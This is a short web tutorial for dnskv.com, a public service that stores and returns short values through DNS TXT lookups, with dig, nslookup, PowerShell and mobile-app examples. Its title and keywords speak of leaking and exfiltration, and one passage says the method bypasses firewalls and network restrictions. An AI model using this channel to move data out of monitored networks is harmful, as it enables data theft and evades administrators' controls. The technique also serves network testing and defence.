Leaking / transferring data over DNS simplified tutorial - dnskv

In many discussions, it immediately came clear that many people aren't familiar with DNS and more comprehensive usage tutorial is required.

Simplest of all the echo service using dig, nslookup and powershell to make a txt record DNS query.

Examples

Using dig (Linux, Mac):

dig txt +short the-secret-message.echo.dnskv.com

Using nslookup via cmd (Old school cmd, Windows):

nslookup -q=txt the-secret-message.echo.dnskv.com

Using PowerShell (The modern way, Windows):

Resolve-DnsName -Type txt -Name the-secret-message.echo.dnskv.com | Where-Object {$_.QueryType -eq '16'} | select Strings

Storing value

Use the samples above, but replace the word echo with your-secret-key. Then the value will be stored on the server for a week with that key. The storage is shared, and you can't overwrite existing values. So use key which isn't yet used. Do not copy paste directly the default values, unless you're using the echo service, which doesn't store anything in the database.

Retrieving value using key

Remove the the-secret-message from the queries above. And replace it with the secret key you've used when storing the value. Then the query should be like:

your-secret-key.dnskv.com

To get sample response, we've set the key hello for you already. Try it out, make a txt query to address:

hello.dnskv.com

Using mobile clients

Using Android device, all the use cases above do work using Network Analyzer, it allows you directly to select dns txt query. Then you'll just enter the addresses as above, with required modifications if desired. Address use:

the-secret-message.echo.dnskv.com

Screenshot

With iPhone use Deep Dig. When querying, add txt after the host name. Example:

the-secret-message.echo.dnskv.com txt

Screenshot

Limitations

The address segments can be up to 63 characters long, and only alphabet, numbers and dash (but not as first character) are allowed. There are limitations which come from the DNS system. The key and value aren't case sensitive. Do not use base64, it won't work. Use the base36 instead.

FYI

Setting the value can be done using any device / program which is able to make a dns query. In some cases it's prevented by the network administration. But in most of cases it isn't. Even if the program says, it's unable to connect, the query and the related data (key, value) was probably sent when it made the query. This can be used to bypass firewalls and network restrictions in cases where those aren't properly done.

The key space is shared between all users. Do not use keys which are easy to guess or probably will overlap with other users keys. The key value pairs will automatically expire in a week.

Do not first query the value to see if it's reserved and then try to set it and query again. The information is efficiently cached. Which means that you'll get the old response from cache. Always set the key value pair first and only after setting it to desired value, query it to check the results.

There are a few more advaneced options, but that's out of the scope of this simple tutorial, see the dnskv.com project page for more information details.

Last update - 2023-01-23

kw: dnskv usage instructions manual tutorial simplified guide faq how to learn learning exfil exfiltration.
Alt lang: AR, CH, ES, FR, JP, RU.